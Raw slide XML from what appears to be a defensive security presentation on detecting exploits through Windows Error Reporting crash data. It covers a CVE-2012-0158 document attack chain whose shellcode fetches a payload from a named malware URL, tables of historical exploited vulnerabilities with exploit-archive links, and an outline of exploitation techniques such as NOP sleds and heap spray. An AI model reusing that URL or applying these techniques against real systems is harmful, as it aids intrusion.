            <a:off x="1008798" y="5625333"/>
            <a:ext cx="1120531" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5969"/>
              <a:gd name="adj2" fmla="val -867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Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangular Callout 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDBF2AD5-9C5D-4154-B201-365100DC2CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2295334" y="5625333"/>
            <a:ext cx="1120531" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5405"/>
              <a:gd name="adj2" fmla="val -9505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Version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangular Callout 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE0383E4-4098-4D34-8362-DAA9331590AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581871" y="5625333"/>
            <a:ext cx="1157882" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 12066"/>
              <a:gd name="adj2" fmla="val -927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App </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1568" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Timestamp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1765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6" name="Rectangular Callout 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{805C5F96-B5F9-4AC5-91CC-D556A3F048EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905758" y="5625333"/>
            <a:ext cx="1120531" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13056"/>
              <a:gd name="adj2" fmla="val -935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Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangular Callout 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9660C5B-E0CE-4FA4-9CAF-3967DE27EBCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6192294" y="5625333"/>
            <a:ext cx="1120531" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 23611"/>
              <a:gd name="adj2" fmla="val -814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Version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangular Callout 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{175B1C78-BED7-4437-804E-2AC37D3A4579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7478830" y="5633351"/>
            <a:ext cx="1157882" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50655"/>
              <a:gd name="adj2" fmla="val -893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Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1568" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Timestamp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1765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39" name="Rectangular Callout 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A2EA75D-7397-43B8-A779-7E4155EF5C33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8802718" y="5633351"/>
            <a:ext cx="1212928" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43671"/>
              <a:gd name="adj2" fmla="val -958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Exception</a:t>
            </a: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001615D1-F936-4A98-AE1C-4983576C5985}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10181653" y="5641133"/>
            <a:ext cx="1120531" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24167"/>
              <a:gd name="adj2" fmla="val -863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r>
              <a:rPr lang="en-US" sz="1765" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Offset in Module of Fault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D1FC32-5EA1-4247-A061-BD5DF3B8E0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438811" y="2197601"/>
            <a:ext cx="5008690" cy="1378919"/>
          </a:xfrm>
          <a:prstGeom prst="rect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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
            <a:lvl6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6pPr>
            <a:lvl7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7pPr>
            <a:lvl8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8pPr>
            <a:lvl9pPr>
              <a:defRPr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lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914367"/>
            <a:r>
              <a:rPr lang="en-US" sz="2353" b="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Now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Scale: Billions of hits per month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Label: Solution exists to problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="280121" indent="-280121" defTabSz="914367">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1961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/>
              </a:rPr>
              <a:t>No PII collected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54DFD-A4B3-4D70-A44C-BDB007C171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92" y="5500648"/>
            <a:ext cx="916402" cy="9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0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exploits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see exploitation attempts using Watson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09600"/>
            <a:ext cx="435846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2209800" y="1143000"/>
            <a:ext cx="1219200" cy="11430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CVE-2012-0158 (MS12-027)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 51" descr="XP icon user accounts">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F8AC8A3-75CD-4394-9AF6-D2E7683F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1493" y="1412044"/>
            <a:ext cx="383042" cy="31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 descr="PC with flat panel">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E6321F8-0BF8-4223-93DC-37668BC0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407" y="1262640"/>
            <a:ext cx="450750" cy="532668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 14" descr="3-01545_attack">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB9C1904-4F3A-4066-9D09-4DE94BD9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8513" y="1412044"/>
            <a:ext cx="478948" cy="45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triped Right Arrow 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{327D23B9-51BC-4005-939A-B665261A6141}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3929640" y="1377160"/>
            <a:ext cx="3137487" cy="323709"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRightArrow">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1001">
            <a:schemeClr val="lt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7"/>
            <a:endParaRPr lang="en-US" sz="1765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CEB11-080B-4FCE-8399-BF0A0FDA62BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8299711" y="1121018"/>
            <a:ext cx="1568743" cy="90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/>
            <a:r>
              <a:rPr lang="en-US" sz="1765" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Windows Error Reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 19" descr="Server">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D65E7607-48C4-429D-8418-3E8D0D6A2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3962" y="1223040"/>
            <a:ext cx="493468" cy="75307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01958-E1C9-4DE4-B0CF-54CB26E77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658" y="1252318"/>
            <a:ext cx="1008478" cy="681656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EE2CFB6-D8C1-42F3-8460-B0DE0938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5" y="2156842"/>
            <a:ext cx="4779818" cy="474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F0374E7-0A3F-4799-ACCA-9D6014C52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83" y="2214181"/>
            <a:ext cx="6663170" cy="58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1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File name                      File size     Date      Time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Attrs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-----------------------------  ---------- ---------- -------- -----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Temporary_Internet_Files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\Content.Outlook\ADIFN8SX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\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Technical_team_to_produce_requirements_document.docx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..\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Temporary_Internet_Files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\Content.MSO\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2BE67846.php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WINWORD.EXE.sig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3352 2011/10/28 15:49:58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WWLIB.DLL.sig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3352 2011/10/28 15:49:58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MSO.DLL.sig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3352 2011/10/28 15:49:58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winword.exe.mdmp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2477547 2011/10/28 15:49:58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23623687.cvr                      1540 2011/10/28 15:50:00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23623687.od                        134 2011/10/28 15:50:00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version.txt                         36 2011/10/28 15:50:00  ----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mdmpmem.hdmp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15301719 2011/10/28 15:50:00  ----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038600" y="1132027"/>
            <a:ext cx="2057400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -9722"/>
              <a:gd name="adj2" fmla="val 1180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one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476750" y="3520282"/>
            <a:ext cx="2057400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44289"/>
              <a:gd name="adj2" fmla="val -745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two</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362317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6" y="424340"/>
            <a:ext cx="9775508" cy="439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29984" y="3162300"/>
            <a:ext cx="9942512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6988" y="4814413"/>
            <a:ext cx="9942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Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Win64;+x64;+Trident/5.0;+.NET+CLR+2.0.50727;+SLCC2;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+.NET+CLR+3.0.30618;+.NET+CLR+3.5.21022;+SLCC1;+.NET4.0C;+.NET4.0E;+InfoPath.3;+BOIE9;ENUS;+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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-office;+MSOffice+14)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354988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Sequence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 5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51610"/>
            <a:ext cx="1371600" cy="1301812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4" descr="http://www.edumax.com/assets/images/visio-2003/IntoWor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7522" y="1371600"/>
            <a:ext cx="1388220" cy="1105744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316543" y="1385333"/>
            <a:ext cx="5046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opens “Technical team to produce requirements document.docx”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 4" descr="http://www.edumax.com/assets/images/visio-2003/IntoWord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466256"/>
            <a:ext cx="1388220" cy="1105744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Down Arrow 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2581387">
            <a:off x="3687023" y="2761144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65042" y="2031663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docx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48017" y="413978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docx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72914" y="3466257"/>
            <a:ext cx="1953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Delivers benign .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>docx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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1441FD-442A-4ECA-AF6E-D8111234F028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4555987" y="2471576"/>
            <a:ext cx="5899579" cy="4456059"/>
            <a:chOff x="4555987" y="2471576"/>
            <a:chExt cx="5899579" cy="44560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8BC742-0C15-40E9-B2F3-A0DE796E385E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4555987" y="2471576"/>
              <a:ext cx="5899579" cy="4456059"/>
              <a:chOff x="4555987" y="2471576"/>
              <a:chExt cx="5899579" cy="4456059"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="Group 24"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5551014" y="5857858"/>
                <a:ext cx="826851" cy="1069777"/>
                <a:chOff x="6255226" y="1063823"/>
                <a:chExt cx="826851" cy="1069777"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="6" name="Picture 4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255226" y="1063823"/>
                  <a:ext cx="826851" cy="762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7" name="Picture 6" descr="C:\Users\johnla\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KIOE1GA1\MCj02932160000[1].wmf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483826" y="1239774"/>
                  <a:ext cx="441316" cy="436626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6255226" y="1825823"/>
                  <a:ext cx="18473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sz="1400" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Picture 4" descr="http://www.edumax.com/assets/images/visio-2003/IntoWord1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540342" y="3466256"/>
                <a:ext cx="1388220" cy="1105744"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Down Arrow 16"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="18732535">
                <a:off x="4632187" y="2756470"/>
                <a:ext cx="381000" cy="533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15033" y="2471576"/>
                <a:ext cx="52405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Secondary file automatically downloaded from:</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>hxxp://www.bridginglinks.com/cheman/widgets/1005/dec.php?fn=</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>1005.doc</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>&amp;m=1&amp;i=1005-a15cc83b597c22e5f6133d102c0d8a17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10402" y="3466256"/>
                <a:ext cx="228599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Delivers malicious file exploiting MSCOMCTL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31816" y="4724400"/>
                <a:ext cx="50237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Shellcode attempts to download:</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>http://www.bridginglinks.com/cheman/widgets/1005/dec.php?fn=</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>1005.bin</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>&amp;m=0&amp;i=1005-a15cc83b597c22e5f6133d102c0d8a17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198627" y="4139786"/>
              <a:ext cx="598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.RTF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E6B06CBC-1F5C-4B17-94D6-D5F401ABEC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="182133" y="140532"/>
          <a:ext cx="4904500" cy="681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Vulnerability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Application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Description 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MS02-039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SQL Server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BO in SQL Server 2000 Resolution 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MS03-011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Flaw in Microsoft JVM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MS03-026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svchost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RPC DCOM/ Blaster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MS03-051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IIS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Frontpage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BO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MS04-011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Lsass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LSASS Vulnerability;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Sasser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MS04-013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CHM ms-its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vulnerability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MS04-045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WINS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Vulnerability in WINS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HandleUpdVersNoReq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MS05-001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Vulnerability in HTML Help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MS05-014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createControlRange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MS06-006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Firefox/IE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WMP EMBED tag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MS06-013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createTextRange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dirty="0"/>
                        <a:t>MS06-014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Microsoft Data Access Components (MDAC)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MS06-024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WMP PNG Chunk Decoding Stack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BO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MS06-027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Word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SmartTags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MS06-028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PowerPoint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Malformed record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MS06-040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Svchost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Netapi32!NetpwNameCompare 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MS06-046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Internet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HHCtrl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MS06-055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Vulnerability in VML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MS06-057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dirty="0"/>
                        <a:t>Windows Shell "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
                        <a:t>WebView</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0"/>
                        <a:t>" ActiveX BO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MS06-067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 DirectAnimation Control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MS06-071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MSXML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MS07-004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Vulnerability in VML Could Allow RCE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MS07-017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Animated Cursor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MS07-027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mdsauth.dll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MS07-029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DNS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Vulnerabilities in DNS Resolution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MS07-033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DirectSpeech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ActiveX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MS07-055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Vulnerabilities in .TIF file parsing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MS07-069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DirectX Media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ActiveX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MS08-016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Word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File path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vulnerabilitin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in MSO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MS08-017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OWC.Spreadsheet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Control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MSRC 8201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Works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WksPictureInterface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MS08-041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 Access Snapshot control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MS08-053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Buffer Overflow in Windows Media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Encoder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90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MSRC 8520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MSMask32.ocx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HTMLHelp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Winhlp32 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long filename buffer overrun (SWIAT OCA 655) </a:t>
                      </a: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SWIAT OCA 914</a:t>
                      </a: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Wordpad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MSWRD8.WPC!ChFindTermInPiece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736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MS07-069</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9338" marR="9338" marT="933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MSRC 7749;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MSHTML (Found 0-day)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9338" marR="9338" marT="9338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D7A81A75-66CD-45C6-A845-5F487FC1F124}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5337056" y="140532"/>
          <a:ext cx="6607293" cy="6442226"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="11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8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Vulnerability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Application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Description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Advisory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24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Quicktime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RTSP  handler http://secunia.com/advisories/23540/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1/2/2007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WinZip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CreateNewFolderFromName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vulnerability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12/31/2006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1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Webcam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latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>YWcVwr.WcViewer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Control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6/8/2007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2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Installer Widget </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0"/>
                        <a:t>http://www.kb.cert.org/vuls/id/120760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8/17/2007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3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Upload Control Send() / Initialize()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latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>vuln</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100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6/19/2007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4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CYFT object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9/19/2007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5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http://www.milw0rm.com/exploits/5043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2/2/08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Yahoo 6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http://milw0rm.com/exploits/5052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2/3/2008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 1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www.securiteam.com/securitynews/6K00C0UEUU.html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12/13/2005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 2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http://www.securiteam.com/exploits/5LP090KJFW.html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8/2/2006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Firefox3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Firefox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http://secunia.com/advisories/25984/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7/10/2007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Opera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Opera </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
                        <a:t>iframe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0"/>
                        <a:t>  vulnerability (0-day)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10/29/2007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Sun Java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Unknown Sun Java VM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11/22/04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Sun Java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VM2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Unknown Sun Java VM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11/22/04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741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AOL aim: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AOL AIM protocol </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0"/>
                        <a:t>http://secunia.com/advisories/26086/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7/17/2007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AOL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Superbuddy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http://dvlabs.tippingpoint.com/advisory/TPTI-07-03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7/18/2006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 player 1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http://securityvulns.com/docs7966.html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2/03/2005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player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http://www.frsirt.com/english/advisories/2007/3548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10/22/2007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Real Player 3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http://secunia.com/advisories/29315/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3/11/2008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Bearshare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/>
                        <a:t>http://secunia.com/secunia_research/2007-50/advisory/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09/05/2007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dirty="0" err="1"/>
                        <a:t>jetAudio</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0"/>
                        <a:t> 7.x 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ActiveX </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
                        <a:t>DownloadFromMusicStore</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0"/>
                        <a:t> Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" u="sng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09/19/2007 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" u="sng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Edraw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Office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/>
                        <a:t>http://www.frsirt.com/english/advisories/2007/3710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08/16/2007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701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t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Zenturi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http://www.frsirt.com/english/advisories/2007/2000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5/31/2007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IncrediMail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AX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http://www.milw0rm.com/exploits/3877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5/8/2007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SonicWall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http://www.milw0rm.com/exploits/4594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11/1/2007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GOM Player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http://www.frsirt.com/english/advisories/2007/3634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10/29/2007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Acer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ActiveX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http://www.kb.cert.org/vuls/id/221700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11/19/2006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Hp.Revolution</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0"/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/>
                        <a:t>http://retrogod.altervista.org/telecom_regkey.html </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100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9/3/2007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Bitdefender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sng" dirty="0"/>
                        <a:t>http://research.eeye.com/html/advisories/published/AD20071120.html</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900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10/24/2007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HPQ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utils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/>
                        <a:t>http://securityreason.com/securityalert/3143 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100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9/19/2007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AskJeeves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http://xforce.iss.net/xforce/xfdb/36757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9/24/2007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Vuln.dll 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http://amxking.bokee.com/viewdiary.179927034.html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12/19/2007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iMesh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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>www.securiteam.com/windowsntfocus/6N00B2AKKU.html</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/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12/18/2007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73682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ImageUploader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http://www.milw0rm.com/exploits/5025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1/31/2008</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9338" marR="9338" marT="9338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Engineering 101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Gain control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack overrun: Return Address or SEH hijack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap overrun: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hijack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reliability Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nopsleds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap spray</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stealth &amp; Evasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decode payload before execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable mitigation defenses: DEP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6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rtl="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>NOP Sleds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219200"/>
            <a:ext cx="160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90	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nop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&lt;shellcode&gt;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1219200"/>
            <a:ext cx="198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41	inc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ecx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&lt;shellcode&gt;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1800" y="1219200"/>
            <a:ext cx="198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push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pop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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRP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&lt;shellcode&gt;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1219200"/>
            <a:ext cx="1981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 err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas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 +0x20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
